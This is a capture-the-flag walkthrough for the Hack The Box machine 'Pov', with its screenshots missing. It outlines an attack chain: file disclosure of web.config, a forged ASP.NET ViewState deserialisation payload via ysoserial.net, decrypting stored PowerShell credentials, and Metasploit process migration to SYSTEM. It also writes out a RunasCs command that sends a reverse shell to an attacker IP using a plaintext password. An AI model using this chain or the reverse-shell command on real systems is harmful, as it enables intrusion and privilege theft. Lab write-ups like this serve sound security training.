WRITE-UPS FOR Pov – solve on 02/02/2024



First of all, we just do a little bit scanning and config /etc/hosts













Looking around at the website, we cannot find anything









It’s time to gobuster for dir and vhost







Hurray, we find the dev.pov.htb







Looking around a little bit, it’s time to use BurpSuite. I found that the download function seems intriguing













Nothing useful with the contact page









Now we know the page is use ASP.NET with the version 4.0.30319. Suft the Internet I found something useful. Try the link for more in4 =)







https://soroush.me/blog/2019/04/exploiting-deserialisation-in-asp-net-via-viewstate/

https://book.hacktricks.xyz/pentesting-web/deserialization/exploiting-__viewstate-parameter



Okey, it seems that we have to exploit LFI and VIEWSTATE value. Search the /web.config file as in instruction



Now we have the machineKey. Just try with ysoserial.



https://github.com/pwntester/ysoserial.net?tab=readme-ov-file







Finally, inject the payload into VIEWSTATE value we found before







The thing had come, I got the reverse shell as expected



Looking around the system, I found some credentials in connection.xml





Trying googling, it seems to be a credential for a object by powershell. I decrypted it.



https://stackoverflow.com/questions/63639876/powershell-password-decrypt





All right, now we have credential for users alaading.



Now, I have nothing to do. By continuing with searching efforts, I found a file called RunadCs. I search the Internet, and well …, It can help a lot.





https://github.com/antonioCoco/RunasCs









Now and use the application to get the second reverse shell on port 4444 with the user alaading







Searching around gave me user.txt as easy as cake.!!



Looking at the RunasCs docs, I found that I can even have more priviledge by adding –bypass-u

.\RunasCs.exe alaading f8gQ8fynP44ek1m3 cmd.exe -r 10.10.14.177:5555 --bypass-u











Now, we have the SeDebugPriviledge, searching the Internet, I found that I can escalate the privilege with this =>>>







The idea is to sending pay load to get the reverse TCP shell in meterpreter using Metasploits.

I won’t write any comment down here for a fews pictures. So if u don’t understand what I’m doing. Try this docs at the DLL hijacking section, it quite similar. (just use executable payload instead of .ddl file)

https://exploit-notes.hdks.org/exploit/windows/privilege-escalation/

























ALRIGHT, I’m back, now we have the reverse shell on Metasploits. To escalate the privilege, we migrate to winlogon.exe.

ps to find all process are running





Find the winlogon.exe. Migrate using ID



Get the shell and all things done





Good job!!! See u on the another machine bro